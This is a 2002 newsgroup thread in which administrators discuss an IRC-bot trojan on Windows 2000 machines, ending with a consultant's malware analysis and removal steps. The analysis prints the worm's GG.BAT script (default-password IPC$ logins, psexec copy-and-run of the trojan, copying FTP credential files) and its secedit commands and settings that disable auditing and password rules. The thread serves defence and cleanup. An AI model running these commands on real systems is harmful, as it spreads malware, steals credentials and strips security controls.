mIRC and Secedit.exe
Frank
been given, and now the same thing is happening in our
office. On about 5 computers, all w2kpro, after logging
in, the system will real quickly, execute an mirc bot
(even if mirc is not installed) and then execute secedit
and close. Since I noticed the mirc bot, I decided to do
a netstat and saw an open connection to 216.x.x.x:6667,
which is in fact an irc server. Later on, it was
discovered that the infected machines were launching DoS
attacks, clogging all our bandwidth.
What I can not figure out, for the life of me, is where
this program can be located, it's not in the startup,
already tried msconfig, and the virus scanner with latest
definitions is not picking it up. If *anyone* has any
clues or ideas I'm wide open - I have an office of people
down my back as it is. Thanks a lot,
Frank
Scott Matott
irc.mimic. On my system it was c:\winnt\system32
\taskmngr.exe and (not to be confused with
taskmgr.exe). It displays an mIRC icon. It also has
an .ini file in the same directory named NT32.ini.
BUT, the secedit commands (or something) appears to have
made my workgroup dysfunctional now-- all my shares are
requiring passwords but I cannot figure out what the PSW
is! let me know if you have that problem...
>.
>
Test Man
encyclopaedia? You will find out how to disinfect your system. In fact,
here is the link
http://securityresponse.symantec.com/avcenter/venc/data/irc.mimic.html
"Frank" <fr...@ascended.net> wrote in message
news:9baf01c24ead$e803b120$3bef2ecf@TKMSFTNGXA10...
Frank DeLuca
a last resort, only after Norton Antivirus, infact, saw
nothign wrong with any of the infected systems and had
definitions updated on 8/22/02. Anyways, thanks for the
reponses, I appreciate it and have cleaned everything out.
>.
>
Layla
given you the link to Symantec and their instructions.
Sometimes the best answer is to direct the OP to the source of information on the
subject.
Glad to hear you have everything cleaned out!
"Frank DeLuca" <fr...@ascended.net> wrote in message
news:fea001c24f69$22ba24a0$39ef2ecf@TKMSFTNGXA08...
: How about not being a smartass? I posted this question as
: >
Frank
is, the link just tells you to download the latest
definitions and run the virus scan - which still does
nothing. We had to figure it out on our own. Maybe it's
a variant of the mimic one that he had posted.
>
Layla
"Frank" <fr...@ascended.net> wrote in message
news:a9b101c24f87$7e458620$9ee62ecf@tkmsftngxa05...
: Ahh, regardless, I still gave him thanks. :) Funny thing
: >
Edward Alfert
I know of 2 computers infected by this trojan... i have removed the tojan
but am attempting to restore the networking settings...
I have restored the default settings using secedit and a backup sdb
database but still no luck... followed instructions from microsoft technet
website.
If anybody has a solution, please post.
thanks.
--
Edward Alfert
http://edward.alfert.com/ * http://www.sysadmin.info/
"Choose a job you love, and you will never have to work a day in your life."
- Unknown Sage
Juan Martinez
i have the same virus, i clean it with NAV, NAV erase
NT32.INI, TASKMNGR.EXE (IRC.Bot), and others files, my
problem is with my shares now requiring password for
access, you solved the problem?, i need ideas .... thank
you
Juan Martinez
pd excuse my english i speak little.....
Scott
password issue. I've noticed others with the same
problems and no answers either. Please email me if you
find a solutions. Thanks!
>.
>
aladin
From Kyle Lai, CISSP, CISA
alad...@hotmail.com
++++++++++++++++++++++++++
SMB over TCP attack, using port 445. It looked for vulnerability in
weak administrator id and passwords on the local Windows 2000 systems.
++++++++++++++++++++++++++
One of my clients also got infected with ocxdll.exe virus. This
occurred back in 8/28/2002 at 3am. After some detailed analysis, I
have determined that it was a Trojan, deleted the detected registry
entries, delete the infected files, tighten the administrator ID and
password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they
have a backup .sdb file, then just reapply the security policy would
fix this part), add users back to local. The cause is bad security
(admin ID and passwords), and a backdoor to drop the ocxdll.exe.
Effected systems:
++++++++++++++++++
- Windows 2000. Security policies alteration was ONLY for Windows
2000
- Windows NT - might be infected, but will not distribute or change
security policies.
What did it do?
++++++++++++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more
random characters
4. It ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions.
[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.
5. Replace security policy settings using Microsoft security editor
(SecEdit.exe /configure) command and reset the security policy to
default settings, and replace security settings in the TFT8675. This
is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the
real program that started the hacking.
7. It tries to hack into the system using the following user ID and
password. If you don't have these user id and passwords, maybe you
are just infected with 1 system, and it could not spread via this
Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If file were there, copy it
anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc
client.
12. The scripts were kicked in to HIDE the mirc window, so you can
ONLY see it in the process. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either
attempt failed or attempt successful.
++++++++++++
Disclaimer: The irc bot scripts have not fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++++++++++++
Impact:
+++++++++++++
This may be a random attack. However, there is a file, ncp.exe
involved, which is the NetCat program. This program allows the
hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
were lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
+++++++++++++
How to remove the Trojan:
++++++++++++++++++++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe)
Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
****************
****NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.
****************
2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure
they are strong passwords! Use mix of Uppercase, Lowercase, numbers,
and non-alphanumeric, i.e. _,+,=,), ...
4. If possible, change Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit
/configure C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups
back into the policy. "Access this computer from the network". The
default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]
Additional Recommendation:
--------------------------
1. Tighten your Firewall and ANY all unwanted traffic from accessing
ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a
user id called "Administrator" with NO GROUPS. This will allow you to
monitor anyone trying to use the "Administrator" login.
3. Setup security log, at minimum, log successful and failed
Logon/Logoff., and monitor the event logs.
++++++++++++++++++++
More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
When MIRC client started running, it runs the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system setting with the
default security policy, plus the additional settings in tftp8675".
It basically removed many security restrictions, remove all audits for
the systems, and of course remove all users in the "Local Users
allowed from the net".
List from TFTP8675:
----------------------
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--------------------------
OCXDLL.EXE is a self-extracted file that included 17 files. It is a
Trojan and it's a worm. In the dll32nt.hlp, it has an instruction to
do IP scan, and store the 20 IP address it found. Mostly likely it
scanned the subnet and file server that were connected to the victim
systems at that time. Then it has an instruction at the end to run
GG.BAT, which is the instruction to attack the 20 IP's that just
found.
Here are the files that were extracted from ocxdll.exe:
+++++++++++++++++++++++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++++++++++++++++++++++++
Here is the GG.BAT text:
------------------------
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
------------------------
-------------------------------------
from SysInternals, here is the description of what the PSEXEC
parameters do:
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
non-interactive applications.
---------------------------------------
aladin
following links:
Part 1:
Kyle Lai, CISSP, CISA
Kyle Lai Consulting
alad...@hotmail.com